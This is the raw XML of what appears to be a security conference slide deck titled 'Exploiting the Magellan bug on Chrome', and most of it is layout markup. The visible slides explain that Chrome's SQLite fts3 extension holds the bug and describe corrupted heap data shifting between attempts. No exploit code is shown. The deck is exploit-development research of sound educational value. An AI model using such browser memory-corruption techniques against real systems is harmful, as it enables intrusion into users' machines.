        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1605546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ko-KR" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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ko-KR" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77CF2A71-FBB8-49DB-B000-33DF016BB409}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-06-28</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2D855CA0-3A47-438D-A3A7-68BA9F166092}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1660344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ko-KR" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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ko-KR" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77CF2A71-FBB8-49DB-B000-33DF016BB409}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-06-28</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2D855CA0-3A47-438D-A3A7-68BA9F166092}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77614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ko-KR" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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CF2A71-FBB8-49DB-B000-33DF016BB409}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-06-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR"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855CA0-3A47-438D-A3A7-68BA9F166092}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39602966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116.xml"/><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124.xml"/><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134.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150.xml"/><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3.xml"/><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172.xml"/><Relationship Id="rId1"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notesSlide" Target="../notesSlides/notesSlide183.xml"/><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0.xml"/><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91.xml"/><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92.xml"/><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93.xml"/><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94.xml"/><Relationship Id="rId1"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98.xml"/><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9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203.xml"/><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204.xml"/><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notesSlide" Target="../notesSlides/notesSlide205.xml"/><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206.xml"/><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207.xml"/><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notesSlide" Target="../notesSlides/notesSlide208.xml"/><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0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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide211.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide211.xml"/><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212.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide213.xml"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide214.xml"/><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215.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide216.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide216.xml"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://december.com/html/4/element/h1.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide217.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://december.com/html/4/element/iframe.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide218.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://december.com/html/4/element/h1.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide218.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://december.com/html/4/element/iframe.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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20.xml"/><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21.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide222.xml"/><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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide223.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide224.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224.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide225.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide225.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide226.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide227.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide228.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide22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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide230.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide231.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide232.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide233.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide234.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide235.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide236.xml"/><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notesSlide" Target="../notesSlides/notesSlide237.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide238.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide23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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide240.xml"/><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1.xml"/><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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.jpeg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.jpeg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.jpeg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide242.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.jpeg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.jpeg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide243.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide243.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide244.xml"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide24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89.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12647" y="4426629"/>
            <a:ext cx="10256096" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploiting the Magellan bug on Chrome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ki Chan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ahn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="55ACEE"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>@externalist</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="55ACEE"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="sqlite icon ext:pngì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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16803" y="881735"/>
            <a:ext cx="3077936" cy="307793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hrome icon ext:pngì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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56026" y="881735"/>
            <a:ext cx="3077935" cy="307793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ute bug icon ext:pngì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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516803" y="881735"/>
            <a:ext cx="807585" cy="807585"/>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cool arrow ext:pngì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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16280" y="2027004"/>
            <a:ext cx="2318204" cy="97364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2" descr="twitter icon ext:pngì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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60945" y="5176152"/>
            <a:ext cx="367394" cy="36739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560379" y="5828378"/>
            <a:ext cx="2301095" cy="776531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42321349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Full Text Search Extensions</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google-style Search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>fts1 through fts5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Chrome only allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fts3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(where the bug lies in)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053192" y="2843507"/>
            <a:ext cx="10091057" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>“Users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0"/>
              <a:t>input a term, or series of terms, perhaps connected by a binary operator or grouped together into a phrase, and the full-text query system finds the set of documents that best matches those terms considering the operators and groupings the user has specified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>.”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1855622509"/>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Problem with this approach</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> will jump to a completely different place on the next corruption attempt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="456456788"/>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9236355" y="692725"/>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7527627" y="558799"/>
            <a:ext cx="4331853"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Rectangle 44"/>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2881737" y="415637"/>
            <a:ext cx="812798"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87773" y="692725"/>
            <a:ext cx="17087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7848142" y="415636"/>
            <a:ext cx="118092" cy="129310"/>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2" name="Curved Connector 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8145520" y="306614"/>
            <a:ext cx="277086" cy="753750"/>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8663742" y="628238"/>
            <a:ext cx="900507" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="890828867"/>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9236355" y="692725"/>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7527627" y="558799"/>
            <a:ext cx="4331853"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Rectangle 44"/>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2881737" y="415637"/>
            <a:ext cx="812798"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87773" y="692725"/>
            <a:ext cx="17087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4706396" y="683489"/>
            <a:ext cx="118092" cy="129310"/>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2" name="Curved Connector 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5003774" y="574467"/>
            <a:ext cx="277086" cy="753750"/>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5521996" y="896091"/>
            <a:ext cx="900507" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3741586241"/>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9236355" y="692725"/>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7527627" y="558799"/>
            <a:ext cx="4331853"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Rectangle 44"/>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2881737" y="415637"/>
            <a:ext cx="812798"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87773" y="692725"/>
            <a:ext cx="17087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5915" y="288195"/>
            <a:ext cx="118092" cy="129310"/>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2" name="Curved Connector 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1993293" y="179173"/>
            <a:ext cx="277086" cy="753750"/>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2511515" y="500797"/>
            <a:ext cx="900507" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1255859114"/>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9236355" y="692725"/>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7527627" y="558799"/>
            <a:ext cx="4331853"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Rectangle 44"/>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2881737" y="415637"/>
            <a:ext cx="812798"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87773" y="692725"/>
            <a:ext cx="17087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6613228" y="424873"/>
            <a:ext cx="118092" cy="129310"/>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2" name="Curved Connector 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6910606" y="315851"/>
            <a:ext cx="277086" cy="753750"/>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7428828" y="637475"/>
            <a:ext cx="900507" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2989550319"/>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Problem with this approach</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> will jump to a completely different place on the next corruption attempt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Why? Because…</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2256222358"/>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Problem with this approach</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> will jump to a completely different place on the next corruption attempt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Why? Because…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
